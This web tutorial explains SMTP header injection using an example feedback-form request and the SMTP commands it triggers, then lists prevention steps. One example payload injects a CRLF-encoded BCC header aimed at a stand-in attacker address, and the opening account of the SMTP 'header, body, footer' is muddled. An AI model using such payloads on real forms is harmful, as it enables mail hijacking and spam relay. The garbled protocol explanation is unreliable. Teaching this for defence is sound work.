Friday, November 22, 2024
Google search engine
HomeNewsWhat is SMTP Header Injection?

What is SMTP Header Injection?

SMTP is a Simple Mail Transfer Protocol which handles the sending, receiving, and relaying of email on the server. It contains three main parts that are used in the SMTP header injection later on we will discuss this :

  • Header: In this part of the SMTP normal command ends.
  • Body: Here we try to inject the malicious input.
  • Footer: footer contains all the malicious in input.
SMTP Communication Between Server and User

 

SMTP Header Injection;

SMTP header injection is a technique that is used by attacker to exploit the mail and web servers of the application when the input is not sanitized carefully, it allows the attacker to send emails to other user, the attacker may attach phishing emails, or any dangerous script.  As emails sometimes contains private information that can be a disaster for a company if an unauthorized person can read that information.

For example: An application that uses requests of the following form to submit feedback:

POST feedback.php HTTP/1.1
Host: lazyroar.com
Content-Length: 56
From=username@gmail.com&Subject=Site+feedback&Message
=love+lazyroar

After submitting the input, the web application to perform an SMTP procedure by using following commands:

MAIL FROM:username@gmail.com
RCPT TO:feedback@lazyroar.com
DATA
From: username@gmail.com
To:feedback@lazyroar.com
Subject:Site feedback
love lazyroar
.

NOTE: The “.” after the message is the end of that particular message.

  • MAIL FROM: It used to set the sender.
  • RCPT TO: This command is containing all the recipient email addresses.
  • DATA: This contains the email data.

Exploiting The STMP Header to Perform SMTP Header Injection:

  • Step 1: Fill the details in the feedback form as show in above example of SMTP.
  • Step 2: Intercept the request that you made by any intercepting tool like Burp Suite.
  • Step 3:  Inject the malicious input in that capture request.

Example:      

POST feedback.php HTTP/1.1
Host: lazyroar.com
Content-Length: 56
From=username@gmail.com%0d%0a 
bcc:attackername%40attacker.com&Subject=Site+feedback&Message
=love+lazyroar 

Note: “%0a” used for a new line, it is an encoded form of “\n”.

  • Step 4: Now send the injected request as shown in above box.

Prevention:

  • Use white list input validation technique to filter the input.
  • Use regular expression for any new line character, whether it is encoded or not, and block if any new line character found.
  • Always use an email library that will prevent these types of attacks automatically.
  • Take any input as malicious input, you can’t trust any user. Hence, test on every possible input. 
Whether you’re preparing for your first job interview or aiming to upskill in this ever-evolving tech landscape, lazyroar Courses are your key to success. We provide top-quality content at affordable prices, all geared towards accelerating your growth in a time-bound manner. Join the millions we’ve already empowered, and we’re here to do the same for you. Don’t miss out – check it out now!

RELATED ARTICLES

Most Popular

Recent Comments